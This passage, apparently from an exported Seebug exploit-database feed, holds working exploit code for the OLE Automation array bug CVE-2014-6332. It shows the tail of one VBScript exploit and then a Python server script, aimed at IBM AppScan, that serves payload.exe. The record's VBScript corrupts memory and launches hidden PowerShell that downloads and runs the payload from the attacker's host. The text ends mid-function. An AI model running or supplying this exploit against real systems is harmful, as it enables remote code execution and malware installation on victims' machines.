i=readmemo(i+16)\r\n j=readmemo(i+&h134) \r\n for k=0 to &h60 step 4\r\n j=readmemo(i+&h120+k)\r\n if(j=14) then\r\n j=0 \r\n redim Preserve aa(a2) \r\n aa(a1+2)(i+&h11c+k)=ab(4)\r\n redim Preserve aa(a0) \r\n j=0 \r\n j=readmemo(i+&h120+k) \r\n \r\n Exit for\r\n end if\r\n next \r\n ab(2)=1.69759663316747E-313\r\n runmumaa() \r\nend function\r\nfunction Over()\r\n On Error Resume Next\r\n dim type1,type2,type3\r\n Over=False\r\n a0=a0+a3\r\n a1=a0+2\r\n a2=a0+&h8000000\r\n \r\n redim Preserve aa(a0) \r\n redim ab(a0) \r\n \r\n redim Preserve aa(a2)\r\n \r\n type1=1\r\n ab(0)=1.123456789012345678901234567890\r\n aa(a0)=10\r\n \r\n If(IsObject(aa(a1-1)) = False) Then\r\n if(intVersion<4) then\r\n mem=cint(a0+1)*16 \r\n j=vartype(aa(a1-1))\r\n if((j=mem+4) or (j*8=mem+8)) then\r\n if(vartype(aa(a1-1))<>0) Then \r\n If(IsObject(aa(a1)) = False ) Then \r\n type1=VarType(aa(a1))\r\n end if \r\n end if\r\n else\r\n redim Preserve aa(a0)\r\n exit function\r\n end if \r\n else\r\n if(vartype(aa(a1-1))<>0) Then \r\n If(IsObject(aa(a1)) = False ) Then\r\n type1=VarType(aa(a1))\r\n end if \r\n end if\r\n end if\r\n end if\r\n \r\n \r\n If(type1=&h2f66) Then \r\n Over=True \r\n End If \r\n If(type1=&hB9AD) Then\r\n Over=True\r\n win9x=1\r\n End If \r\n redim Preserve aa(a0) \r\n \r\nend function\r\nfunction ReadMemo(add) \r\n On Error Resume Next\r\n redim Preserve aa(a2) \r\n \r\n ab(0)=0 \r\n aa(a1)=add+4 \r\n ab(0)=1.69759663316747E-313 \r\n ReadMemo=lenb(aa(a1)) \r\n \r\n ab(0)=0 \r\n \r\n redim Preserve aa(a0)\r\nend function\r\n</script>\r\n</body>\r\n</html>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-92734", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T13:05:54", "description": "<p> IBM Security AppScan Standard OLE Automation Array Remote Code Execution</p><p> Author: Naser Farhadi</p><p> Linkedin: <a href=\"http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909\" rel=\"nofollow\">http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909</a></p><p> Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7</p><p> Exploit Based on MS14-064 CVE-2014-6332 <a href=\"http://www.exploit-db.com/exploits/35229/\" rel=\"nofollow\">http://www.exploit-db.com/exploits/35229/</a> </p><p> if you able to exploit IE then you can exploit appscan and acunetix ;)</p><p> This Python Script Will Start A Sample HTTP Server On Attacker Machine And Serves Exploit Code And</p>", "cvss3": {}, "published": "2015-08-31T00:00:00", "type": "seebug", "title": "IBM Security AppScan Standard <= 9.0.2 - OLE Automation Array Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-08-31T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89272", "id": "SSV:89272", "sourceData": "\n #!/usr/bin/python\r\n\u00a0\r\nimport BaseHTTPServer, socket\r\n\u00a0\r\n\u00a0#\r\n# Usage:\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 chmod +x appscan.py\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ./appscan.py\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 ...\r\n#\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 nc 172.20.10.14 333\r\n#\r\n\u00a0\r\nclass RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n\u00a0\u00a0\u00a0\u00a0def do_GET(req):\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.send_response(200)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if req.path == \"/payload.exe\":\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.send_header('Content-type', 'application/exe')\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.end_headers()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exe = open(\"payload.exe\", 'rb')\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.wfile.write(exe.read())\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exe.close()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else:\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.send_header('Content-type', 'text/html')\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.end_headers()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0req.wfile.write(\"\"\"Please scan me!\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<SCRIPT LANGUAGE=\"VBScript\">\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function runmumaa() \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0set shell=createobject(\"Shell.Application\")\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0command=\"Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://\"\"\"+socket.gethostbyname(socket.gethostname())+\"\"\"/payload.exe',\\\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');\"\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0shell.ShellExecute \"powershell\", \"-Command \" & command, \"\", \"runas\", 0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 aa()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 ab()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 a1\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 a2\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 a3\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 win9x\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 intVersion\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 rnda\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 funclass\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim\u00a0\u00a0 myarray\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Begin()\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function Begin()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0info=Navigator.UserAgent\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(instr(info,\"Win64\")>0)\u00a0\u00a0 then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exit\u00a0\u00a0 function\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if (instr(info,\"MSIE\")>0)\u00a0\u00a0 then \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0intVersion = CInt(Mid(info, InStr(info, \"MSIE\") + 5, 2))\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0exit\u00a0\u00a0 function\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0win9x=0\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0BeginInit()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If Create()=True Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0myarray=\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0if(intVersion<4) then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0document.write(\"<br> IE\")\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0document.write(intVersion)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0runshellcode()\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0else\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0setnotsafemode()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end if\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function BeginInit()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Randomize()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim aa(5)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0redim ab(5)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a0=13+17*rnd(6)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0a3=7+3*rnd(5)\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function Create()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0dim i\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Create=False\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0For i = 0 To 400\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0If Over()=True Then\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0'\u00a0\u00a0 document.write(i)\u00a0\u00a0\u00a0\u00a0 \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Create=True\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Exit For\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0End If \r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0Next\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end function\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0sub testaa()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0end sub\r\n\u00a0\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0function mydata()\r\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0On Error Resume 